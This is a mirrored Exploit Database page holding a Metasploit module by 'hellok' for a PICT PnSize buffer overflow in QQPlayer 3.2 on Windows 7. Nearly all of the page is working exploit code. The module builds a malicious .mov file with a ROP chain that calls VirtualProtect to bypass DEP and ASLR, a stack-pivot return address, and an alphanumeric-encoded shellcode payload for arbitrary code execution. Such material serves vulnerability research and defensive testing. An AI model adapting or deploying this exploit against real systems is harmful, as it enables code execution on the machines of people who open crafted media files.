QQPLAYER Player 3.2 – PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)

• Exploit Database
• 112 阅读

• 作者： hellok
  日期： 2011-11-21
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/18137/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118

  # Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require &apos;msf/core&apos; class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS&apos;, &apos;Description&apos;=> %q{ This module exploits a vulnerability in QQPLAYER Player 3.2. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;hellok&apos;,#special thank corelanc0d3r for &apos;mona&apos; ], &apos;References&apos; => [ ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, &apos;DisablePayloadHandler&apos; => &apos;true&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 750, &apos;BadChars&apos; => "",#Memcpy &apos;EncoderType&apos;=> Msf::Encoder::Type::AlphanumUpper, &apos;DisableNops&apos;=>&apos;True&apos;, &apos;PrependEncoder&apos; => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", &apos;EncoderOptions&apos; => { &apos;BufferRegister&apos; => &apos;ECX&apos;, }, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows 7&apos;, { &apos;Ret&apos; => 0x67664cde } ], ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => &apos;11 21 2011&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ false, &apos;The file name.&apos;,&apos;msf.mov&apos; ]), ], self.class) end def exploit # !mona rop rop_gadgets = [ 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x12345678, 0x67664CE4, 0x01020304, 0x10203040, 0x22331122, 0x23456789, 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x00a9c18c, # <- *&VirtualProtect() 0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe) #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe) 0x008cf099, # XCHG EAX,ESI # RETN 0x6497aaad, # POP EBP # RETN (avformat-52.dll) 0x100272bf, # ptr to &apos;call esp&apos; (from i18nu.dll) 0x005fc00b, # POP EBX # RETN (QQPlayer.exe) 0x00000331, # <- change size to mark as executable if needed (-> ebx) 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x63d18000, # RW pointer (lpOldProtect) (-> ecx) 0x63d05001, # POP EDI # RETN (avutil-49.dll) 0x63d05002, # ROP NOP (-> edi) 0x008bf00b, # POP EDX # RETN (QQPlayer.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00468800, # POP EAX # RETN (QQPlayer.exe) 0x90909090, # NOPS (-> eax) 0x008bad5c, # PUSHAD # RETN (QQPlayer.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*")   stackpivot = [target.ret].pack(&apos;L&apos;)   buffer =rand_text_alpha_upper(90)#2 buffer << rop_gadgets buffer << payload.encoded   junk = rand_text_alpha_upper(2306 - buffer.length)   buffer << junk buffer << stackpivot buffer << rand_text_alpha_upper(3000)#3000   path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" ) fd = File.open(path, "rb" ) sploit = fd.read(fd.stat.size) fd.close   sploit << buffer   file_create(sploit) end end